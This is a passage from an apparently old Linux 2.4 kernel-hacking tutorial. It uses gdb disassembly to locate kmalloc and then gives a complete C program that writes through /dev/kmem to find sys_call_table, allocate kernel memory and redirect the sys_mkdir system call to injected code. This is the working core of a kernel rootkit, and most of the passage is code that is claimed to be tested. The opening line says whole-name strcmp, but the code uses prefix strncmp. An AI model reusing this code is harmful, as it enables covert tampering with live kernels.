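The comparison uses strcmp on the whole name, so a longer symbol that merely begins with "kmalloc" is not mistaken for kmalloc itself.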

The kmalloc function takes two parameters: the size of the requested memory and the GFP specifier. To find the opcode, we will use the debugger and disassemble any kernel function that contains a call to the kmalloc function.

    # gdb -q /usr/src/linux/vmlinux
    (gdb) disas inter_module_register
    Dump of assembler code for function inter_module_register:
    0xc01a57b4:  push   %ebp
    0xc01a57b5:  push   %edi
    0xc01a57b6:  push   %esi
    0xc01a57b7:  push   %ebx
    0xc01a57b8:  sub    $0x10,%esp
    0xc01a57bb:  mov    0x24(%esp,1),%ebx
    0xc01a57bf:  mov    0x28(%esp,1),%esi
    0xc01a57c3:  mov    0x2c(%esp,1),%ebp
    0xc01a57c7:  movl   $0x1f0,0x4(%esp,1)
    0xc01a57cf:  movl   $0x14,(%esp,1)
    0xc01a57d6:  call   0xc01bea2a
    ...

It doesn't matter what the function does; what matters is that it contains what we need, a call to the kmalloc function. Pay attention to the last lines. First the parameters are placed on the stack (the esp register points to the top of the stack), and then the function call follows. The GFP specifier is placed on the stack first (movl $0x1f0,0x4(%esp,1)). For kernel versions 2.4.9 and higher this value is 0x1f0. Let's find the opcode of this instruction:

    (gdb) x/xw inter_module_register+19
    0xc01a57c7:  0x042444c7

If we find this opcode, we can calculate the address of the kmalloc function. At first glance the address of this function is the argument of the call instruction, but this is not quite so. Unlike in system_call, what follows the instruction here is not the address of kmalloc but its offset relative to the current address. Let's verify this by examining the opcode of the call 0xc01bea2a instruction:

    (gdb) x/xw inter_module_register+34
    0xc01a57d6:  0x01924fe8

The first byte is e8, which is the opcode of the call instruction. Let's find the value of the argument of this instruction:

    (gdb) x/xw inter_module_register+35
    0xc01a57d7:  0x0001924f

If we now add the current address 0xc01a57d6, the offset 0x0001924f and the 5 bytes of the instruction, we get the required address of the kmalloc function: 0xc01bea2a.
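The same arithmetic can be written as a small helper. This is a sketch for 32-bit x86 only, and the name call_target is made up for the example: it takes the address of a 5-byte near call (opcode e8 followed by a 32-bit little-endian displacement) and returns the address being called.

```c
#include <stdint.h>

/*
 * Decode a 5-byte near call (e8 rel32) located at address `addr`.
 * Returns the call target, or 0 if the first byte is not e8.
 */
static uint32_t call_target(uint32_t addr, const unsigned char insn[5])
{
    uint32_t rel;

    if (insn[0] != 0xe8)
        return 0;
    rel = (uint32_t)insn[1] | ((uint32_t)insn[2] << 8) |
          ((uint32_t)insn[3] << 16) | ((uint32_t)insn[4] << 24);
    /* The displacement is relative to the next instruction (addr + 5).
       Unsigned arithmetic wraps modulo 2^32, so backward calls work too. */
    return addr + 5 + rel;
}
```

With the bytes e8 4f 92 01 00 at address 0xc01a57d6, the helper returns 0xc01bea2a, matching the gdb session above.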

This concludes the theoretical calculations and, using the above technique, we will intercept the sys_mkdir system call.

6. An example of interception by means of /dev/kmem

    /* source 6.0 */
    #define _GNU_SOURCE             /* for memmem() */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <linux/module.h>       /* struct kernel_sym, get_kernel_syms() on 2.4 */

    /* Number of the system call to intercept */
    #define _SYS_MKDIR_ 39
    #define KMEM_FILE "/dev/kmem"
    #define MAX_SYMS 4096

    /* Format of the IDTR register */
    struct {
        unsigned short limit;
        unsigned int base;
    } __attribute__ ((packed)) idtr;

    /* Format of an IDT interrupt gate */
    struct {
        unsigned short off1;
        unsigned short sel;
        unsigned char none, flags;
        unsigned short off2;
    } __attribute__ ((packed)) idt;

    /* Structure passed to the get_kmalloc function */
    struct kma_struc {
        ulong (*kmalloc) (uint, int);   /* address of the kmalloc function */
        int size;                       /* size of the memory to allocate */
        int flags;                      /* GFP flag, 0x1f0 for kernels > 2.4.9 */
        ulong mem;                      /* address of the allocated block */
    } __attribute__ ((packed)) kmalloc;

    /* A function that merely allocates a block of memory
       in the kernel address space */
    int get_kmalloc(struct kma_struc *k)
    {
        k->mem = k->kmalloc(k->size, k->flags);
        return 0;
    }

    /* Returns the address of a kernel symbol (needed to find kmalloc) */
    ulong get_sym(char *n)
    {
        struct kernel_sym tab[MAX_SYMS];
        int numsyms;
        int i;

        numsyms = get_kernel_syms(NULL);
        if (numsyms > MAX_SYMS || numsyms < 0)
            return 0;
        get_kernel_syms(tab);
        for (i = 0; i < numsyms; i++) {
            if (!strncmp(n, tab[i].name, strlen(n)))
                return tab[i].value;
        }
        return 0;
    }

    /* Our new system call; it does nothing ;) */
    int new_mkdir(const char *path)
    {
        return 0;
    }

    /* Reads size bytes from /dev/kmem at offset into buf */
    static inline int rkm(int fd, uint offset, void *buf, uint size)
    {
        if (lseek(fd, offset, 0) != offset) {
            printf("lseek err\n");
            return 0;
        }
        if (read(fd, buf, size) != size)
            return 0;
        return size;
    }

    /* The same, but writes to /dev/kmem */
    static inline int wkm(int fd, uint offset, void *buf, uint size)
    {
        if (lseek(fd, offset, 0) != offset)
            return 0;
        if (write(fd, buf, size) != size)
            return 0;
        return size;
    }

    /* Reads 4 bytes from /dev/kmem */
    static inline int rkml(int fd, uint offset, ulong *buf)
    {
        return rkm(fd, offset, buf, sizeof(ulong));
    }

    /* The same, but writes */
    static inline int wkml(int fd, uint offset, ulong buf)
    {
        return wkm(fd, offset, &buf, sizeof(ulong));
    }

    /* Obtains the address of sys_call_table */
    ulong get_sct(int kmem)
    {
        ulong sys_call_off;     /* address of the int $0x80 handler
                                   (the system_call function) */
        char *p;
        char sc_asm[128];

        asm("sidt %0" : "=m" (idtr));
        if (!rkm(kmem, idtr.base + (8 * 0x80), &idt, sizeof(idt)))
            return 0;
        sys_call_off = ((ulong)idt.off2 << 16) | idt.off1;
        if (!rkm(kmem, sys_call_off, sc_asm, sizeof(sc_asm)))
            return 0;
        p = (char *)memmem(sc_asm, sizeof(sc_asm), "\xff\x14\x85", 3);
        if (!p)
            return 0;
        p += 3;                 /* skip the opcode; the table address follows */
        printf("call for sys_call_table at %08lx\n", (ulong)p);
        return *(ulong *)p;
    }

    /* Determines the address of the kmalloc function */
    ulong get_kma(ulong pgoff)
    {
        uint i;
        unsigned char buf[0x10000], *p, *p1;
        int kmemz;
        ulong ret;

        ret = get_sym("kmalloc");
        if (ret) {
            printf("\nZer gut!\n");
            return ret;
        }
        kmemz = open("/dev/kmem", O_RDONLY);
        if (kmemz < 0)
            return 0;
        for (i = pgoff + 0x100000; i < (pgoff + 0x1000000); i += 0x10000) {
            if (!rkm(kmemz, i, buf, sizeof(buf))) {
                close(kmemz);
                return 0;
            }
            /* 68 f0 01 00 is the start of "push $0x1f0" (the GFP argument) */
            p1 = memmem(buf, sizeof(buf), "\x68\xf0\x01\x00", 4);
            if (p1) {
                p = memmem(p1 + 4, sizeof(buf) - (p1 + 4 - buf), "\xe8", 1);
                if (p) {
                    p++;        /* skip e8; the relative offset follows */
                    close(kmemz);
                    return *(unsigned long *)p + i + (p - buf) + 4;
                }
            }
        }
        close(kmemz);
        return 0;
    }

    int main()
    {
        int kmem;
        /* !! - empty, must be filled in */
        ulong get_kmalloc_size;     /* size of the get_kmalloc function !! */
        ulong get_kmalloc_addr;     /* address of the get_kmalloc function !! */
        ulong new_mkdir_size;       /* size of the interceptor function !! */
        ulong new_mkdir_addr;       /* address of the interceptor function !! */
        ulong sys_mkdir_addr;       /* address of the sys_mkdir system call */
        ulong page_offset;          /* lower bound of the kernel address space */
        ulong sct;                  /* address of sys_call_table */
        ulong kma;                  /* address of the kmalloc function */
        unsigned char tmp[1024];    /* saved bytes of sys_mkdir; must hold
                                       at least get_kmalloc_size bytes */

        kmem = open(KMEM_FILE, O_RDWR, 0);
        if (kmem < 0)
            return 1;
        sct = get_sct(kmem);
        page_offset = sct & 0xF0000000;
        kma = get_kma(page_offset);
        printf("OK\n"
               "page_offset\t\t:\t0x%08lx\n"
               "sys_call_table\t:\t0x%08lx\n"
               "kmalloc()\t\t:\t0x%08lx\n",
               page_offset, sct, kma);

        /* Find the address of sys_mkdir */
        if (!rkml(kmem, sct + (_SYS_MKDIR_ * 4), &sys_mkdir_addr)) {
            printf("Cannot get addr of %d syscall\n", _SYS_MKDIR_);
            perror("er: ");
            return 1;
        }

        /* Save the first N bytes of sys_mkdir */
        if (!rkm(kmem, sys_mkdir_addr, tmp, get_kmalloc_size)) {
            printf("Cannot save old %d syscall!\n", _SYS_MKDIR_);
            return 1;
        }

        /* Overwrite the first N bytes with the get_kmalloc function */
        if (!wkm(kmem, sys_mkdir_addr, (void *)get_kmalloc_addr,
                 get_kmalloc_size)) {
            printf("Can't overwrite our syscall %d!\n", _SYS_MKDIR_);
            return 1;
        }

        kmalloc.kmalloc = (void *) kma;     /* address of the kmalloc function */
        kmalloc.size = new_mkdir_size;      /* size of the requested memory
                                               (size of the new_mkdir interceptor) */
        kmalloc.flags = 0x1f0;              /* GFP specifier */

        /* Invoke the sys_mkdir system call, thereby executing
           our get_kmalloc function */
        mkdir((char *)&kmalloc, 0);

        /* Restore the original sys_mkdir */
        if (!wkm(kmem, sys_mkdir_addr, tmp, get_kmalloc_size)) {
            printf("Can't restore syscall %d !\n", _SYS_MKDIR_);
            return 1;
        }

        if (kmalloc.mem < page_offset) {
            printf("Allocated memory is too low (%08lx < %08lx)\n",
                   kmalloc.mem, page_offset);
            return 1;
        }

        /* Display the results */
        printf("sys_mkdir_addr\t\t:\t0x%08lx\n"
               "get_kmalloc_size\t:\t0x%08lx (%lu bytes)\n\n"
               "our kmem region\t\t:\t0x%08lx\n"
               "size of our kmem\t:\t0x%08x (%d bytes)\n\n",
               sys_mkdir_addr, get_kmalloc_size, get_kmalloc_size,
               kmalloc.mem, kmalloc.size, kmalloc.size);

        /* Place our new system call in kernel space */
        if (!wkm(kmem, kmalloc.mem, (void *)new_mkdir_addr, new_mkdir_size)) {
            printf("Unable to locate new system call !\n");
            return 1;
        }

        /* Point the sys_call_table entry at our new call */
        if (!wkml(kmem, sct + (_SYS_MKDIR_ * 4), kmalloc.mem)) {
            printf("Eh ...");
            return 1;
        }
        return 0;
    }
    /* EOF */

Let's compile the resulting code and determine the addresses and sizes of the get_kmalloc and new_mkdir functions. It is too early to run the result! To find the addresses and sizes, we will use the objdump utility:

    # gcc -o src-6.0 src-6.0.c
    # objdump -x ./src-6.0 > dump

Let's open the dump file and find the data we are interested in:

    080485a4 g     F .text  00000032  get_kmalloc
    080486b1 g     F .text  0000000a  new_mkdir

Now we enter these values into our program:

    ulong get_kmalloc_size = 0x32;
    ulong get_kmalloc_addr = 0x080485a4;
    ulong new_mkdir_size = 0x0a;
    ulong new_mkdir_addr = 0x080486b1;

Now let's recompile the program. Running it intercepts the sys_mkdir system call: all calls to sys_mkdir will now be serviced by the new_mkdir function.

End Of Paper / EOP

The code from all sections was tested and found to work on the 2.4.22 kernel. When preparing the report, materials from the site were used